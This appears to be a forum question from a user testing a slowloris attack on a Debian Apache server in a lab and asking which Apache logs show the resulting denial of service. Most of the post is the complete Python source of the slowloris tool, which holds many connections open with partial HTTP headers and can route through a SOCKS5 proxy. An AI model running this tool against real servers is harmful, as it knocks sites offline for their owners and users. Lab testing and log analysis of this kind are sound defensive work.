# Apache logs: checking for a slowloris attack

Tags: apache, security, debian

I'm doing simulation of a slowloris attack on a Debian server running Apache.

The attacking machines are Debian too.

In order to make sure that the slowloris attack was effective, I would like to access the Apache logs and check if the denial of service occurred and if it stopped accepting connections, the state of the buffers, and so on. The time of the attacks are known.

I am using in a lab this slowloris code:

https://github.com/gkbrk/slowloris http://pastebin.com/CsjTavjN

```
#!/usr/bin/python
import socket, random, time, sys, argparse, random, logging

parser = argparse.ArgumentParser(description="Slowloris, low bandwidth stress test tool for websites")
parser.add_argument('host',  nargs="?", help="Host to preform stress test on")
parser.add_argument('-p', '--port', default=80, help="Port of webserver, usually 80", type=int)
parser.add_argument('-s', '--sockets', default=150, help="Number of sockets to use in the test", type=int)
parser.add_argument('-v', '--verbose', dest="verbose", action="store_true", help="Increases logging")
parser.add_argument('-ua', '--randuseragents', dest="randuseragent", action="store_true", help="Randomizes user-agents with each request")
parser.add_argument('-x', '--useproxy', dest="useproxy", action="store_true", help="Use a SOCKS5 proxy for connecting")
parser.add_argument('--proxy-host', default="127.0.0.1", help="SOCKS5 proxy host")
parser.add_argument('--proxy-port', default="8080", help="SOCKS5 proxy port", type=int)
parser.set_defaults(verbose=False)
parser.set_defaults(randuseragent=False)
parser.set_defaults(useproxy=False)
args = parser.parse_args()

if len(sys.argv)<=1:
    parser.print_help()
    sys.exit(1)

if not args.host:
    print("Host required!")
    parser.print_help()
    sys.exit(1)

if args.useproxy:
    print("Using SOCKS5 proxy for connecting...")
    try:
        import socks
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port)
        socket.socket = socks.socksocket
    except ImportError:
        print("Socks Proxy Library Not Available!")
if args.verbose == True:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.DEBUG)
else:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.INFO)

list_of_sockets = []
user_agents = [
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
]

def init_socket(ip):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)
    s.connect((ip,args.port))

    s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
    if args.randuseragent:
        s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
    else:
        s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
    s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
    return s

def main():
    ip = args.host
    socket_count = args.sockets
    logging.info("Attacking %s with %s sockets.", ip, socket_count)

    logging.info("Creating sockets...")
    for _ in range(socket_count):
        try:
            logging.debug("Creating socket nr %s", _)
            s = init_socket(ip)
        except socket.error:
            break
        list_of_sockets.append(s)

    while True:
        logging.info("Sending keep-alive headers... Socket count: %s", len(list_of_sockets))
        for s in list(list_of_sockets):
            try:
                s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
            except socket.error:
                list_of_sockets.remove(s)

        for _ in range(socket_count - len(list_of_sockets)):
            logging.debug("Recreating socket...")
            try:
                s = init_socket(ip)
                if s:
                    list_of_sockets.append(s)
            except socket.error:
                break
        time.sleep(15)

if __name__ == "__main__":
    main()
```

Does Apache provide such information? Where to check in Debian? Any suggestions on what else to check?